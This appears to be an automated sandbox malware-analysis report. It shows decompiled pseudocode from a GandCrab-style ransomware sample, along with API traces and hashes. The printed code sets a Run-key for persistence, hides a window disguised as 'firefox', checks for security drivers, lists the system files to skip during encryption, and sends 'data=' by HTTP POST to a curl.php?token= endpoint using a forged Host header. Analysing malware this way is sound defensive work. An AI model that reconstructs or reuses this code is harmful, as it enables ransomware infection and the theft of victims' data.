				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0) != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47);
					asm("sbb esi, esi");
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}




































                                        0x0f9d296b
                                        0x0f9d296d
                                        0x0f9d2979
                                        0x0f9d2980
                                        0x0f9d2984
                                        0x0f9d298c
                                        0x0f9d2993
                                        0x0f9d299a
                                        0x0f9d29a8
                                        0x0f9d29b0
                                        0x0f9d29bd
                                        0x0f9d29c7
                                        0x0f9d29ce
                                        0x0f9d29eb
                                        0x0f9d29f8
                                        0x0f9d29ff
                                        0x0f9d2a06
                                        0x0f9d2a0d
                                        0x0f9d2a14
                                        0x0f9d2a1b
                                        0x0f9d2a22
                                        0x0f9d2a29
                                        0x0f9d2a30
                                        0x0f9d2a37
                                        0x0f9d2a3e
                                        0x0f9d2a45
                                        0x0f9d2a4c
                                        0x0f9d2a53
                                        0x0f9d2a5a
                                        0x0f9d2a61
                                        0x0f9d2a68
                                        0x0f9d2a6f
                                        0x0f9d2a76
                                        0x0f9d2a7d
                                        0x0f9d2a8c
                                        0x0f9d2ac7
                                        0x0f9d2a8e
                                        0x0f9d2aa4
                                        0x0f9d2aaf
                                        0x0f9d2ab1
                                        0x0f9d2ab7
                                        0x0f9d2abf
                                        0x0f9d2abf

                                        APIs
                                        • lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0F9D299D
                                          • Part of subcall function 0F9D8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                          • Part of subcall function 0F9D8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                          • Part of subcall function 0F9D8150: GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                          • Part of subcall function 0F9D8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                          • Part of subcall function 0F9D8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                          • Part of subcall function 0F9D8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                          • Part of subcall function 0F9D8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F9D2C45,00000000), ref: 0F9D2A84
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D2A8F
                                        • RegSetValueExW.ADVAPI32(0F9D2C45,00520050,00000000,00000001,00000000,00000000), ref: 0F9D2AA4
                                        • RegCloseKey.ADVAPI32(0F9D2C45), ref: 0F9D2AB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                        • String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                        • API String ID: 553367697-3791882466
                                        • Opcode ID: fb18767f14730c885fc456d5cd8ff6945c52713ca969cf888927546bd05e14b1
                                        • Instruction ID: d48cc2fa45286989a46075163706fb35882ddb295905790725ed96fe2a3e69b5
                                        • Opcode Fuzzy Hash: fb18767f14730c885fc456d5cd8ff6945c52713ca969cf888927546bd05e14b1
                                        • Instruction Fuzzy Hash: 5C31EDB090121DDFEB20CF91E948BEDBFB9FB01709F208159D5186A282D7BA4558CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137windowthreadregistryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0F9D2D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				short _t42;
				void* _t49;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				if(E0F9D2F50( &(_v84.message)) != 0 || E0F9D2F50( &_v96) != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0F9D2C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0F9D2D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
							}
							goto L15;
						}
						ExitThread(_t71);
					}
					ExitThread();
				} else {
					_v84.message = 0x730066;
					_v84.wParam = 0x660064;
					_v84.lParam = 0x2e0077;
					_v84.time = 0x790073;
					_v84.pt = 0x73;
					if(E0F9D2F50( &(_v84.message)) != 0) {
						L15:
						ExitThread(0);
					}
					_t61 = E0F9D30A0(_t62, _t67, _t69);
					if(_t61 != 0) {
						goto L15;
					}
					_push(_t61);
					E0F9D2AD0();
					goto L5;
				}
			}















                                        0x0f9d2d39
                                        0x0f9d2d3a
                                        0x0f9d2d3d
                                        0x0f9d2d45
                                        0x0f9d2d4a
                                        0x0f9d2d52
                                        0x0f9d2d5a
                                        0x0f9d2d62
                                        0x0f9d2d67
                                        0x0f9d2d6f
                                        0x0f9d2d77
                                        0x0f9d2d7f
                                        0x0f9d2d8e
                                        0x0f9d2de9
                                        0x0f9d2df1
                                        0x0f9d2df9
                                        0x0f9d2e01
                                        0x0f9d2e09
                                        0x0f9d2e11
                                        0x0f9d2e22
                                        0x0f9d2e26
                                        0x0f9d2e3d
                                        0x0f9d2e41
                                        0x0f9d2e49
                                        0x0f9d2e51
                                        0x0f9d2e5f
                                        0x0f9d2e68
                                        0x0f9d2e6e
                                        0x0f9d2e73
                                        0x0f9d2e7b
                                        0x0f9d2eaf
                                        0x0f9d2eb4
                                        0x0f9d2ebc
                                        0x0f9d2ec8
                                        0x0f9d2ecf
                                        0x0f9d2ee3
                                        0x0f9d2eeb
                                        0x0f9d2eee
                                        0x0f9d2eee
                                        0x0f9d2f09
                                        0x0f9d2f17
                                        0x0f9d2f1c
                                        0x0f9d2f25
                                        0x0f9d2f17
                                        0x00000000
                                        0x0f9d2f09
                                        0x0f9d2ebf
                                        0x0f9d2ebf
                                        0x0f9d2e75
                                        0x0f9d2d9d
                                        0x0f9d2da1
                                        0x0f9d2da9
                                        0x0f9d2db1
                                        0x0f9d2db9
                                        0x0f9d2dc1
                                        0x0f9d2dd0
                                        0x0f9d2f3d
                                        0x0f9d2f3f
                                        0x0f9d2f3f
                                        0x0f9d2dd6
                                        0x0f9d2ddd
                                        0x00000000
                                        0x00000000
                                        0x0f9d2de3
                                        0x0f9d2de4
                                        0x00000000
                                        0x0f9d2de4

                                        APIs
                                          • Part of subcall function 0F9D2F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0F9D2F74
                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F9D2E19
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0F9D2E2E
                                        • LoadIconW.USER32 ref: 0F9D2E59
                                        • RegisterClassExW.USER32 ref: 0F9D2E68
                                        • ExitThread.KERNEL32 ref: 0F9D2E75
                                          • Part of subcall function 0F9D2F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F9D2F8D
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2E7B
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2E81
                                        • CreateWindowExW.USER32 ref: 0F9D2EA7
                                        • SetWindowLongW.USER32 ref: 0F9D2EB4
                                        • ExitThread.KERNEL32 ref: 0F9D2EBF
                                          • Part of subcall function 0F9D2F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 0F9D2FA8
                                          • Part of subcall function 0F9D2F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 0F9D2FCF
                                          • Part of subcall function 0F9D2F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F9D2FE3
                                          • Part of subcall function 0F9D2F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D2FFA
                                        • ExitThread.KERNEL32 ref: 0F9D2F3F
                                          • Part of subcall function 0F9D2AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F9D2AEA
                                          • Part of subcall function 0F9D2AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D2B2C
                                          • Part of subcall function 0F9D2AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F9D2B38
                                          • Part of subcall function 0F9D2AD0: ExitThread.KERNEL32 ref: 0F9D2C47
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F9D2EC8
                                        • UpdateWindow.USER32(00000000), ref: 0F9D2ECF
                                        • CreateThread.KERNEL32 ref: 0F9D2EE3
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2EEE
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F9D2F05
                                        • TranslateMessage.USER32(?), ref: 0F9D2F1C
                                        • DispatchMessageW.USER32 ref: 0F9D2F23
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F9D2F37
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                        • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                        • API String ID: 3011903443-520298170
                                        • Opcode ID: dd101fe91ddf72711ca9ebebd399a984b366423cb6c52d79be93b1cae54eaa79
                                        • Instruction ID: ed824f0ce8f8965badd5dc97d6c2dd60581aa0ff5608e7108fb867421c6f0b72
                                        • Opcode Fuzzy Hash: dd101fe91ddf72711ca9ebebd399a984b366423cb6c52d79be93b1cae54eaa79
                                        • Instruction Fuzzy Hash: 9751817014D301AFF3209F61CC09B5B7BE8AF44B59F20891CF684AA1C2D7B9A559CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7EF0 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131networkfilememoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D7EF0(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0F9D7CE0(_t64);
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0);
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t62 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f006e;
						_v52 = 0x6f006d;
						_v48 = 0x650072;
						_v44 = 0x610072;
						_v40 = 0x73006e;
						_v36 = 0x6d006f;
						_v32 = 0x63002e;
						_v28 = 0x69006f;
						_v24 = 0x6e;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63);
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000);
					return _v12;
				} else {
					return _t40;
				}
			}



























                                        0x0f9d7ef8
                                        0x0f9d7efb
                                        0x0f9d7f00
                                        0x0f9d7f03
                                        0x0f9d7f03
                                        0x0f9d7f0b
                                        0x0f9d7f22
                                        0x0f9d7f28
                                        0x0f9d7f2a
                                        0x0f9d7f31
                                        0x0f9d7f36
                                        0x0f9d7f58
                                        0x0f9d7f60
                                        0x0f9d7f63
                                        0x0f9d7f87
                                        0x0f9d7f8b
                                        0x0f9d7f98
                                        0x0f9d7fa1
                                        0x0f9d7fa8
                                        0x0f9d7faf
                                        0x0f9d7fb6
                                        0x0f9d7fbd
                                        0x0f9d7fc4
                                        0x0f9d7fcb
                                        0x0f9d7fd2
                                        0x0f9d7fd9
                                        0x0f9d7fe0
                                        0x0f9d7fe7
                                        0x0f9d7ff6
                                        0x0f9d800d
                                        0x0f9d805c
                                        0x0f9d800f
                                        0x0f9d8015
                                        0x0f9d8018
                                        0x0f9d801d
                                        0x0f9d802c
                                        0x0f9d8030
                                        0x0f9d8030
                                        0x0f9d8035
                                        0x00000000
                                        0x00000000
                                        0x0f9d8037
                                        0x0f9d8042
                                        0x0f9d8049
                                        0x0f9d8058
                                        0x00000000
                                        0x00000000
                                        0x0f9d805a
                                        0x00000000
                                        0x0f9d8058
                                        0x0f9d8030
                                        0x0f9d802c
                                        0x0f9d800d
                                        0x0f9d7ff6
                                        0x0f9d8062
                                        0x0f9d8069
                                        0x0f9d806e
                                        0x0f9d807a
                                        0x0f9d8089
                                        0x0f9d7f3e
                                        0x0f9d7f3e
                                        0x0f9d7f3e

                                        APIs
                                        • InternetCloseHandle.WININET(?), ref: 0F9D7F03
                                        • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F9D7F22
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F9D6EE6,ipv4bot.whatismyipaddress.com,0F9DFF10), ref: 0F9D7F4F
                                        • wsprintfW.USER32 ref: 0F9D7F63
                                        • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F9D7F81
                                        • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F9D7FEE
                                        • HttpSendRequestW.WININET(00000000,00650072,006F006D,00000000,0000006E), ref: 0F9D8005
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0F9D8024
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0F9D8050
                                        • GetLastError.KERNEL32 ref: 0F9D805C
                                        • InternetCloseHandle.WININET(00000000), ref: 0F9D8069
                                        • InternetCloseHandle.WININET(00000000), ref: 0F9D806E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D6EE6), ref: 0F9D807A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                        • String ID: .$:$H$HTTP/1.1$m$n$n$n$o$o$r$r$s
                                        • API String ID: 3906118045-3956618741
                                        • Opcode ID: a5185331b08e407ddc99e68baf2b406a7829f8ed8850cf6cfe8c200f05a273f7
                                        • Instruction ID: add1e3e8d9089d497ee8dcb87b67e8f7400d7a7f3856858366b6aa17cbdbd84f
                                        • Opcode Fuzzy Hash: a5185331b08e407ddc99e68baf2b406a7829f8ed8850cf6cfe8c200f05a273f7
                                        • Instruction Fuzzy Hash: 38418171600218BFEB208F55DC49FEE7FBDEF44B95F208019F904A62C2C7B599648BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6790 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 78stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0F9D6790(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}










                                        0x0f9d6799
                                        0x0f9d679c
                                        0x0f9d67a1
                                        0x0f9d67a3
                                        0x0f9d67a6
                                        0x0f9d67a9
                                        0x0f9d67aa
                                        0x0f9d67b0
                                        0x0f9d67b0
                                        0x0f9d67b3
                                        0x0f9d67b4
                                        0x0f9d67b0
                                        0x0f9d67c4
                                        0x0f9d67d1
                                        0x0f9d67e6
                                        0x00000000
                                        0x0f9d6830
                                        0x0f9d6836
                                        0x0f9d683b
                                        0x0f9d6840
                                        0x0f9d6840
                                        0x0f9d67d5
                                        0x0f9d67d5
                                        0x0f9d67db
                                        0x0f9d67db

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F9D69A3), ref: 0F9D679C
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D67A1
                                        • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F9D67CD
                                        • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F9D67E2
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F9D67EE
                                        • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F9D67FA
                                        • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F9D6806
                                        • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F9D6812
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F9D681E
                                        • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F9D682A
                                        • lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 0F9D6836
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi$lstrlen
                                        • String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                        • API String ID: 203586893-634406045
                                        • Opcode ID: e7198e4cc11ab65284600a8f22f7fd72b6eea5ec06534b07424cc7c7a69f701d
                                        • Instruction ID: fb9f6914023d2799385fa6110f50e1366150e3d815b812e2cf7aedb1e735d2a3
                                        • Opcode Fuzzy Hash: e7198e4cc11ab65284600a8f22f7fd72b6eea5ec06534b07424cc7c7a69f701d
                                        • Instruction Fuzzy Hash: 5F11E96220173E655A21367D9C42EEF119D8DC2BA4B758525F601F24C3DF85F61348F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D54A0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136stringmemorynetworkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E0F9D54A0(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0F9D7CE0( &_v36);
				_v24 = E0F9D5060();
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x74cb6981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0xf9dfb20]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0xf9dfb30]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0xf9dfb40]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0xf9dfb50]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0xf9dfb60]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0xf9dfb70]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E0F9D9010( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E0F9D53A0( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E0F9D7EF0( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E0F9D5210(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x74cb6981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}





















                                        0x0f9d54ab
                                        0x0f9d54ad
                                        0x0f9d54b4
                                        0x0f9d54b7
                                        0x0f9d54c2
                                        0x0f9d54d8
                                        0x0f9d54df
                                        0x0f9d54f3
                                        0x0f9d54f7
                                        0x0f9d54fc
                                        0x0f9d5501
                                        0x0f9d550a
                                        0x0f9d550a
                                        0x0f9d550c
                                        0x0f9d5518
                                        0x0f9d551e
                                        0x0f9d5520
                                        0x0f9d5529
                                        0x0f9d5531
                                        0x0f9d5539
                                        0x0f9d553e
                                        0x0f9d5546
                                        0x0f9d554b
                                        0x0f9d5553
                                        0x0f9d5558
                                        0x0f9d5560
                                        0x0f9d5565
                                        0x0f9d556d
                                        0x0f9d5572
                                        0x0f9d5578
                                        0x0f9d5587
                                        0x0f9d558d
                                        0x0f9d55a1
                                        0x0f9d55ad
                                        0x0f9d55b9
                                        0x0f9d55bf
                                        0x0f9d55c2
                                        0x0f9d55c9
                                        0x0f9d55ca
                                        0x0f9d55d2
                                        0x0f9d55d7
                                        0x0f9d55df
                                        0x0f9d55e0
                                        0x0f9d55e1
                                        0x0f9d55ea
                                        0x0f9d55eb
                                        0x0f9d55f6
                                        0x0f9d55fc
                                        0x0f9d5601
                                        0x0f9d5606
                                        0x0f9d5616
                                        0x0f9d5626
                                        0x0f9d5618
                                        0x0f9d5618
                                        0x0f9d561d
                                        0x0f9d5622
                                        0x0f9d5622
                                        0x0f9d561d
                                        0x0f9d5616
                                        0x0f9d5601
                                        0x0f9d5636
                                        0x0f9d5642
                                        0x0f9d564e
                                        0x0f9d5650
                                        0x0f9d5655
                                        0x0f9d5658
                                        0x0f9d5658
                                        0x0f9d5666
                                        0x0f9d5666
                                        0x0f9d5503
                                        0x0f9d5508
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
